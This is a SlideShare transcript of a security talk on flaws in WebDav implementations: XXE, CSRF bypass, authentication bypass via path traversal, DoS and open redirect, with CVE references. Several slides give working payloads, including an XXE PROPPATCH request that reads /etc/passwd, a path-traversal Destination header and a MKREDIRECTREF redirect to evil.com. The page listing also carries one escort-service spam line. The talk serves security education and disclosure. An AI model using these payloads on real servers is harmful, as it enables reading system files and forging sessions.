SlideShare a Scribd company logo
1 of 18
Download to read offline
What should a hacker know about WebDav?
Vulnerabilities in various WebDav implementations
Mikhail Egorov
Short BIO – Mikhail Egorov
▶ Application Security Engineer at Odin [ http://www.odin.com ]
▶ Security researcher and bug hunter
▶ Graduated from BMSTU with MSc. in Information Security [ IU8 ]
▶ Holds OSCP and CISSP certificates
▶ See my blog [ http://0ang3el.blogspot.com ]
WebDav is complex
▶ Many standards that prescribes how to implement various WebDav methods
RFC 4918, RFC 3253, RFC 3648, RFC 3744, RFC 5323, RFC 4437, RFC 5842
▶ Many WebDav methods
OPTIONS, TRACE, GET, HEAD, POST, PUT, DELETE, COPY, MOVE, PROPPATCH,
PROPFIND, MKCOL, LOCK, UNLOCK, SEARCH, BIND, UNBIND, REBIND,
MKREDIRECTREF, UPDATEREDIRECTREF, ORDERPATCH, ACL, REPORT
▶ Different Webdav implementations
Generic approach
▶ Try various XXE attacks
▶ Issue OPTIONS requests and see what “interesting” methods are supported by
WebDav library
▶ Try attack that follows from security considerations section of RFCs and
“common sense” for all “interesting” methods
▶ Observe source code, if available, to find various implementation flaws
WebDav XXE attacks
▶ Methods PROPPATCH, PROPFIND, LOCK, etc. accept XML as input
▶ Especially Java implementations are vulnerable 
Apache Jacrabbit WebDav XXE
▶ CVE-2015-1833 [ http://www.securityfocus.com/archive/1/535582 ]
▶ Exploit code [ https://www.exploit-db.com/exploits/37110/ ]
▶ Video PoC [ https://www.youtube.com/watch?v=Hg3AXoG89Gs ]
Milton WebDav XXE
▶ CVE-2015-7326 [ http://www.securityfocus.com/archive/1/536813 ]
cloudme.com XXE
▶ CloudMe is a secure European service that makes your life a little bit easier.
With CloudMe you don’t have to think twice about where your files are, they’re
always with you …
▶ https://webdav.cloudme.com is vulnerable WebDav endpoint
Apache Sling OOXML parsing XXE
▶ Apache Tika OSGi bundle to parse documents
▶ Apache POI is used to parse OOXML documents
▶ Apache POI library XXE [ https://access.redhat.com/security/cve/CVE-2014-3529 ]
Apache Jackrabbit WebDav CSRF
▶ JCR-3909 [ https://issues.apache.org/jira/browse/JCR-3909 ]
▶ POST request is allowed and treated as PUT
▶ There is Refer-based CSRF protection, but empty Referer bypasses it
▶ Could be used to mount XXE attack for systems in the internal network!
Exploiting WebDav XXE tricks
▶ Create resource
PUT /resource HTTP/1.1
Hack
▶ Write content of the file to a property of the resource with PROPPATCH
method
PROPPATCH /resource HTTP/1.1
<?xml version=“1.0” encoding=“UTF-8”?>
<!DOCTYPE propertyupdate [
<!ENTITY loot SYSTEM “file:///etc/passwd”> ]>
<D:propertyupdate xmlns:D=“DAV:”><D:set><D:prop>
<a xmlns=“http://this.is.xxe.baby”>&loot;</a>
</D:prop></D:set></D:propertyupdate>
Exploiting WebDav XXE tricks
▶ Read property with content of the file with PROPFIND method
PROPFIND /resource HTTP/1.1
<?xml version=“1.0” encoding=“UTF-8”?>
<propfind xmlns=“DAV:”><prop>
<q:a xmlns:q=“http://this.is.xxe.baby”/>
</prop></propfind>
Exploiting WebDav XXE tricks
▶ OOB XXE will work with any method that supports XML input
• When general external entities are prohibited
▶ SSRF attack will work with any method that supports XML input
• When only external DTDs are allowed
Milton WebDav AUTHN bypass
▶ Cookie AUTHN [ preferred method in Windows, from Win7 ]
• miltonUserUrl=/users/admin/;Path=/;Expires=Thu, 06-Mar-2014 20:55:23 GMT;Max-Age=31536000
• miltonUserUrlHash=0.884150694443924:9c74dc9fb62c2926c911ce07b5e7dcb2;Path=/;Expires=Thu, 06-Mar-2014
20:55:23 GMT;Max-Age=31536000;HttpOnly
▶ Cookie is signed using HMAC-SHA1
• key is in keys.txt file stored in java.io.tmpdir directory
▶ Path traversal in Destination header of MOVE and COPY requests
• http://127.0.0.1:8080/../../../../../../../../../../_DAV/HACK/tmp
• We can overwrite keys.txt file 
• After app server restart we can craft valid cookies 
Confluence WebDav DoS attack
▶ Based on Apache Jackrabbit WebDav code
▶ Supports Depth: infinity header in PROPFIND request
▶ Allows DOCTYPE declaration
Billion Laughs like attack, but with limited number [ 64000 ] of entity expansions, is possible
▶ Xerces-J library vulnerable to CVE-2013-4002 have been used
https://jira.atlassian.com/browse/CONF-37991
Yandex.Disk invalidated redirect
▶ WebDav access to Yandex.Disk – http://webdav.yandex.ru
▶ Supports MKREDIRECTREF request
▶ It is possible to create resource that will redirect the victim from Yandex.Disk to
arbitrary site
MKREDIRECTREF /good.txt HTTP/1.1
Host: webdav.yandex.ru
<?xml version="1.0" encoding="utf-8" ?>
<D:mkredirectref xmlns:D="DAV:">
<D:reftarget>
<D:href>http://evil.com</D:href>
</D:reftarget>
</D:mkredirectref>
Takeaways
▶ WebDav is a complex protocol, it extends attack surface of your system
▶ WebDav-related RFCs have security considerations parts, unfortunately, many
WebDav implementations ignore security considerations
▶ WebDav libraries in Java suffers from XXE issues, because most XML parsers in
Java are insecure in default configuration
Questions?
? ? ?

More Related Content

What's hot

Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016bugcrowd
 
DNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification neededDNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification neededFrans Rosén
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
XXE: How to become a Jedi
XXE: How to become a JediXXE: How to become a Jedi
XXE: How to become a JediYaroslav Babin
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
 
OWASP A4 XML External Entities (XXE)
OWASP A4 XML External Entities (XXE)OWASP A4 XML External Entities (XXE)
OWASP A4 XML External Entities (XXE)Michael Furman
 
PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)Will Schroeder
 
Red Team Methodology - A Naked Look
Red Team Methodology - A Naked LookRed Team Methodology - A Naked Look
Red Team Methodology - A Naked LookJason Lang
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricksGarethHeyes
 
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...Frans Rosén
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
Racing The Web - Hackfest 2016
Racing The Web - Hackfest 2016Racing The Web - Hackfest 2016
Racing The Web - Hackfest 2016Aaron Hnatiw
 
Hacking liferay
Hacking liferayHacking liferay
Hacking liferayArmel Nene
 
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.Mikhail Egorov
 
PHP unserialization vulnerabilities: What are we missing?
PHP unserialization vulnerabilities: What are we missing?PHP unserialization vulnerabilities: What are we missing?
PHP unserialization vulnerabilities: What are we missing?Sam Thomas
 

What's hot (20)

Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016
 
DNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification neededDNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification needed
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
 
XXE: How to become a Jedi
XXE: How to become a JediXXE: How to become a Jedi
XXE: How to become a Jedi
 
SSRF workshop
SSRF workshop SSRF workshop
SSRF workshop
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host header
 
OWASP A4 XML External Entities (XXE)
OWASP A4 XML External Entities (XXE)OWASP A4 XML External Entities (XXE)
OWASP A4 XML External Entities (XXE)
 
PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)
 
Frans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadFrans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides Ahmedabad
 
HTTP Security Headers
HTTP Security HeadersHTTP Security Headers
HTTP Security Headers
 
Red Team Methodology - A Naked Look
Red Team Methodology - A Naked LookRed Team Methodology - A Naked Look
Red Team Methodology - A Naked Look
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricks
 
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing Techniques
 
Racing The Web - Hackfest 2016
Racing The Web - Hackfest 2016Racing The Web - Hackfest 2016
Racing The Web - Hackfest 2016
 
Hacking liferay
Hacking liferayHacking liferay
Hacking liferay
 
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
 
PHP unserialization vulnerabilities: What are we missing?
PHP unserialization vulnerabilities: What are we missing?PHP unserialization vulnerabilities: What are we missing?
PHP unserialization vulnerabilities: What are we missing?
 

Similar to What should a hacker know about WebDav?

FIWARE Wednesday Webinars - How to Secure IoT Devices
FIWARE Wednesday Webinars - How to Secure IoT DevicesFIWARE Wednesday Webinars - How to Secure IoT Devices
FIWARE Wednesday Webinars - How to Secure IoT DevicesFIWARE
 
Hta t07-did-you-read-the-news-http-request-hijacking
Hta t07-did-you-read-the-news-http-request-hijackingHta t07-did-you-read-the-news-http-request-hijacking
Hta t07-did-you-read-the-news-http-request-hijackingКомсс Файквэе
 
The Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptx
The Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptxThe Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptx
The Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptxlior mazor
 
SPDY - http reloaded - WebTechConference 2012
SPDY - http reloaded - WebTechConference 2012SPDY - http reloaded - WebTechConference 2012
SPDY - http reloaded - WebTechConference 2012Fabian Lange
 
Hack & Fix, Hands on ColdFusion Security Training
Hack & Fix, Hands on ColdFusion Security TrainingHack & Fix, Hands on ColdFusion Security Training
Hack & Fix, Hands on ColdFusion Security TrainingColdFusionConference
 
Malware Analysis For The Enterprise
Malware Analysis For The EnterpriseMalware Analysis For The Enterprise
Malware Analysis For The EnterpriseJason Ross
 
Secure your web app presentation
Secure your web app presentationSecure your web app presentation
Secure your web app presentationFrans Lytzen
 
Threat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my HoneypotsThreat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my HoneypotsAPNIC
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device InsecurityJeremy Brown
 
20190516 web security-basic
20190516 web security-basic20190516 web security-basic
20190516 web security-basicMksYi
 
CodeIgniter i18n Security Flaw
CodeIgniter i18n Security FlawCodeIgniter i18n Security Flaw
CodeIgniter i18n Security FlawAbbas Naderi
 
Apache Wizardry - Ohio Linux 2011
Apache Wizardry - Ohio Linux 2011Apache Wizardry - Ohio Linux 2011
Apache Wizardry - Ohio Linux 2011Rich Bowen
 
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...APNIC
 
OSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainOSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainInfosecTrain
 
HTTP Security Headers Every Java Developer Must Know
HTTP Security Headers Every Java Developer Must KnowHTTP Security Headers Every Java Developer Must Know
HTTP Security Headers Every Java Developer Must KnowAyoma Wijethunga
 
Building APIs with NodeJS on Microsoft Azure Websites - Redmond
Building APIs with NodeJS on Microsoft Azure Websites - RedmondBuilding APIs with NodeJS on Microsoft Azure Websites - Redmond
Building APIs with NodeJS on Microsoft Azure Websites - RedmondRick G. Garibay
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecuritiesamiable_indian
 

Similar to What should a hacker know about WebDav? (20)

FIWARE Wednesday Webinars - How to Secure IoT Devices
FIWARE Wednesday Webinars - How to Secure IoT DevicesFIWARE Wednesday Webinars - How to Secure IoT Devices
FIWARE Wednesday Webinars - How to Secure IoT Devices
 
Owasp top 10 2013
Owasp top 10 2013Owasp top 10 2013
Owasp top 10 2013
 
Hta t07-did-you-read-the-news-http-request-hijacking
Hta t07-did-you-read-the-news-http-request-hijackingHta t07-did-you-read-the-news-http-request-hijacking
Hta t07-did-you-read-the-news-http-request-hijacking
 
The Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptx
The Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptxThe Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptx
The Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptx
 
SPDY - http reloaded - WebTechConference 2012
SPDY - http reloaded - WebTechConference 2012SPDY - http reloaded - WebTechConference 2012
SPDY - http reloaded - WebTechConference 2012
 
Hack & Fix, Hands on ColdFusion Security Training
Hack & Fix, Hands on ColdFusion Security TrainingHack & Fix, Hands on ColdFusion Security Training
Hack & Fix, Hands on ColdFusion Security Training
 
Malware Analysis For The Enterprise
Malware Analysis For The EnterpriseMalware Analysis For The Enterprise
Malware Analysis For The Enterprise
 
Secure your web app presentation
Secure your web app presentationSecure your web app presentation
Secure your web app presentation
 
The SPDY Protocol
The SPDY ProtocolThe SPDY Protocol
The SPDY Protocol
 
Threat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my HoneypotsThreat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my Honeypots
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device Insecurity
 
Bsides final
Bsides finalBsides final
Bsides final
 
20190516 web security-basic
20190516 web security-basic20190516 web security-basic
20190516 web security-basic
 
CodeIgniter i18n Security Flaw
CodeIgniter i18n Security FlawCodeIgniter i18n Security Flaw
CodeIgniter i18n Security Flaw
 
Apache Wizardry - Ohio Linux 2011
Apache Wizardry - Ohio Linux 2011Apache Wizardry - Ohio Linux 2011
Apache Wizardry - Ohio Linux 2011
 
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...
 
OSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainOSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ Infosectrain
 
HTTP Security Headers Every Java Developer Must Know
HTTP Security Headers Every Java Developer Must KnowHTTP Security Headers Every Java Developer Must Know
HTTP Security Headers Every Java Developer Must Know
 
Building APIs with NodeJS on Microsoft Azure Websites - Redmond
Building APIs with NodeJS on Microsoft Azure Websites - RedmondBuilding APIs with NodeJS on Microsoft Azure Websites - Redmond
Building APIs with NodeJS on Microsoft Azure Websites - Redmond
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecurities
 

Recently uploaded

Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024Andreas Granig
 
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...OnePlan Solutions
 
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte GermanySuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte GermanyChristoph Pohl
 
React Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief UtamaReact Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief UtamaHanief Utama
 
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...confluent
 
Balasore Best It Company|| Top 10 IT Company || Balasore Software company Odisha
Balasore Best It Company|| Top 10 IT Company || Balasore Software company OdishaBalasore Best It Company|| Top 10 IT Company || Balasore Software company Odisha
Balasore Best It Company|| Top 10 IT Company || Balasore Software company Odishasmiwainfosol
 
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxKnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxTier1 app
 
Powering Real-Time Decisions with Continuous Data Streams
Powering Real-Time Decisions with Continuous Data StreamsPowering Real-Time Decisions with Continuous Data Streams
Powering Real-Time Decisions with Continuous Data StreamsSafe Software
 
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...OnePlan Solutions
 
CRM Contender Series: HubSpot vs. Salesforce
CRM Contender Series: HubSpot vs. SalesforceCRM Contender Series: HubSpot vs. Salesforce
CRM Contender Series: HubSpot vs. SalesforceBrainSell Technologies
 
SensoDat: Simulation-based Sensor Dataset of Self-driving Cars
SensoDat: Simulation-based Sensor Dataset of Self-driving CarsSensoDat: Simulation-based Sensor Dataset of Self-driving Cars
SensoDat: Simulation-based Sensor Dataset of Self-driving CarsChristian Birchler
 
Software Coding for software engineering
Software Coding for software engineeringSoftware Coding for software engineering
Software Coding for software engineeringssuserb3a23b
 
Introduction Computer Science - Software Design.pdf
Introduction Computer Science - Software Design.pdfIntroduction Computer Science - Software Design.pdf
Introduction Computer Science - Software Design.pdfFerryKemperman
 
PREDICTING RIVER WATER QUALITY ppt presentation
PREDICTING  RIVER  WATER QUALITY  ppt presentationPREDICTING  RIVER  WATER QUALITY  ppt presentation
PREDICTING RIVER WATER QUALITY ppt presentationvaddepallysandeep122
 
Precise and Complete Requirements? An Elusive Goal
Precise and Complete Requirements? An Elusive GoalPrecise and Complete Requirements? An Elusive Goal
Precise and Complete Requirements? An Elusive GoalLionel Briand
 
Implementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureImplementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureDinusha Kumarasiri
 
VK Business Profile - provides IT solutions and Web Development
VK Business Profile - provides IT solutions and Web DevelopmentVK Business Profile - provides IT solutions and Web Development
VK Business Profile - provides IT solutions and Web Developmentvyaparkranti
 
How to submit a standout Adobe Champion Application
How to submit a standout Adobe Champion ApplicationHow to submit a standout Adobe Champion Application
How to submit a standout Adobe Champion ApplicationBradBedford3
 

Recently uploaded (20)

Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024
 
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
 
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte GermanySuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
 
React Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief UtamaReact Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief Utama
 
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...
 
Balasore Best It Company|| Top 10 IT Company || Balasore Software company Odisha
Balasore Best It Company|| Top 10 IT Company || Balasore Software company OdishaBalasore Best It Company|| Top 10 IT Company || Balasore Software company Odisha
Balasore Best It Company|| Top 10 IT Company || Balasore Software company Odisha
 
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxKnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
 
Powering Real-Time Decisions with Continuous Data Streams
Powering Real-Time Decisions with Continuous Data StreamsPowering Real-Time Decisions with Continuous Data Streams
Powering Real-Time Decisions with Continuous Data Streams
 
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...
 
CRM Contender Series: HubSpot vs. Salesforce
CRM Contender Series: HubSpot vs. SalesforceCRM Contender Series: HubSpot vs. Salesforce
CRM Contender Series: HubSpot vs. Salesforce
 
SensoDat: Simulation-based Sensor Dataset of Self-driving Cars
SensoDat: Simulation-based Sensor Dataset of Self-driving CarsSensoDat: Simulation-based Sensor Dataset of Self-driving Cars
SensoDat: Simulation-based Sensor Dataset of Self-driving Cars
 
Software Coding for software engineering
Software Coding for software engineeringSoftware Coding for software engineering
Software Coding for software engineering
 
Introduction Computer Science - Software Design.pdf
Introduction Computer Science - Software Design.pdfIntroduction Computer Science - Software Design.pdf
Introduction Computer Science - Software Design.pdf
 
PREDICTING RIVER WATER QUALITY ppt presentation
PREDICTING  RIVER  WATER QUALITY  ppt presentationPREDICTING  RIVER  WATER QUALITY  ppt presentation
PREDICTING RIVER WATER QUALITY ppt presentation
 
Precise and Complete Requirements? An Elusive Goal
Precise and Complete Requirements? An Elusive GoalPrecise and Complete Requirements? An Elusive Goal
Precise and Complete Requirements? An Elusive Goal
 
Implementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureImplementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with Azure
 
VK Business Profile - provides IT solutions and Web Development
VK Business Profile - provides IT solutions and Web DevelopmentVK Business Profile - provides IT solutions and Web Development
VK Business Profile - provides IT solutions and Web Development
 
How to submit a standout Adobe Champion Application
How to submit a standout Adobe Champion ApplicationHow to submit a standout Adobe Champion Application
How to submit a standout Adobe Champion Application
 
Hot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort Service
Hot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort ServiceHot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort Service
Hot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort Service
 
Advantages of Odoo ERP 17 for Your Business
Advantages of Odoo ERP 17 for Your BusinessAdvantages of Odoo ERP 17 for Your Business
Advantages of Odoo ERP 17 for Your Business
 

What should a hacker know about WebDav?

  • 1. What should a hacker know about WebDav? Vulnerabilities in various WebDav implementations Mikhail Egorov
  • 2. Short BIO – Mikhail Egorov ▶ Application Security Engineer at Odin [ http://www.odin.com ] ▶ Security researcher and bug hunter ▶ Graduated from BMSTU with MSc. in Information Security [ IU8 ] ▶ Holds OSCP and CISSP certificates ▶ See my blog [ http://0ang3el.blogspot.com ]
  • 3. WebDav is complex ▶ Many standards that prescribes how to implement various WebDav methods RFC 4918, RFC 3253, RFC 3648, RFC 3744, RFC 5323, RFC 4437, RFC 5842 ▶ Many WebDav methods OPTIONS, TRACE, GET, HEAD, POST, PUT, DELETE, COPY, MOVE, PROPPATCH, PROPFIND, MKCOL, LOCK, UNLOCK, SEARCH, BIND, UNBIND, REBIND, MKREDIRECTREF, UPDATEREDIRECTREF, ORDERPATCH, ACL, REPORT ▶ Different Webdav implementations
  • 4. Generic approach ▶ Try various XXE attacks ▶ Issue OPTIONS requests and see what “interesting” methods are supported by WebDav library ▶ Try attack that follows from security considerations section of RFCs and “common sense” for all “interesting” methods ▶ Observe source code, if available, to find various implementation flaws
  • 5. WebDav XXE attacks ▶ Methods PROPPATCH, PROPFIND, LOCK, etc. accept XML as input ▶ Especially Java implementations are vulnerable 
  • 6. Apache Jacrabbit WebDav XXE ▶ CVE-2015-1833 [ http://www.securityfocus.com/archive/1/535582 ] ▶ Exploit code [ https://www.exploit-db.com/exploits/37110/ ] ▶ Video PoC [ https://www.youtube.com/watch?v=Hg3AXoG89Gs ]
  • 7. Milton WebDav XXE ▶ CVE-2015-7326 [ http://www.securityfocus.com/archive/1/536813 ]
  • 8. cloudme.com XXE ▶ CloudMe is a secure European service that makes your life a little bit easier. With CloudMe you don’t have to think twice about where your files are, they’re always with you … ▶ https://webdav.cloudme.com is vulnerable WebDav endpoint
  • 9. Apache Sling OOXML parsing XXE ▶ Apache Tika OSGi bundle to parse documents ▶ Apache POI is used to parse OOXML documents ▶ Apache POI library XXE [ https://access.redhat.com/security/cve/CVE-2014-3529 ]
  • 10. Apache Jackrabbit WebDav CSRF ▶ JCR-3909 [ https://issues.apache.org/jira/browse/JCR-3909 ] ▶ POST request is allowed and treated as PUT ▶ There is Refer-based CSRF protection, but empty Referer bypasses it ▶ Could be used to mount XXE attack for systems in the internal network!
  • 11. Exploiting WebDav XXE tricks ▶ Create resource PUT /resource HTTP/1.1 Hack ▶ Write content of the file to a property of the resource with PROPPATCH method PROPPATCH /resource HTTP/1.1 <?xml version=“1.0” encoding=“UTF-8”?> <!DOCTYPE propertyupdate [ <!ENTITY loot SYSTEM “file:///etc/passwd”> ]> <D:propertyupdate xmlns:D=“DAV:”><D:set><D:prop> <a xmlns=“http://this.is.xxe.baby”>&loot;</a> </D:prop></D:set></D:propertyupdate>
  • 12. Exploiting WebDav XXE tricks ▶ Read property with content of the file with PROPFIND method PROPFIND /resource HTTP/1.1 <?xml version=“1.0” encoding=“UTF-8”?> <propfind xmlns=“DAV:”><prop> <q:a xmlns:q=“http://this.is.xxe.baby”/> </prop></propfind>
  • 13. Exploiting WebDav XXE tricks ▶ OOB XXE will work with any method that supports XML input • When general external entities are prohibited ▶ SSRF attack will work with any method that supports XML input • When only external DTDs are allowed
  • 14. Milton WebDav AUTHN bypass ▶ Cookie AUTHN [ preferred method in Windows, from Win7 ] • miltonUserUrl=/users/admin/;Path=/;Expires=Thu, 06-Mar-2014 20:55:23 GMT;Max-Age=31536000 • miltonUserUrlHash=0.884150694443924:9c74dc9fb62c2926c911ce07b5e7dcb2;Path=/;Expires=Thu, 06-Mar-2014 20:55:23 GMT;Max-Age=31536000;HttpOnly ▶ Cookie is signed using HMAC-SHA1 • key is in keys.txt file stored in java.io.tmpdir directory ▶ Path traversal in Destination header of MOVE and COPY requests • http://127.0.0.1:8080/../../../../../../../../../../_DAV/HACK/tmp • We can overwrite keys.txt file  • After app server restart we can craft valid cookies 
  • 15. Confluence WebDav DoS attack ▶ Based on Apache Jackrabbit WebDav code ▶ Supports Depth: infinity header in PROPFIND request ▶ Allows DOCTYPE declaration Billion Laughs like attack, but with limited number [ 64000 ] of entity expansions, is possible ▶ Xerces-J library vulnerable to CVE-2013-4002 have been used https://jira.atlassian.com/browse/CONF-37991
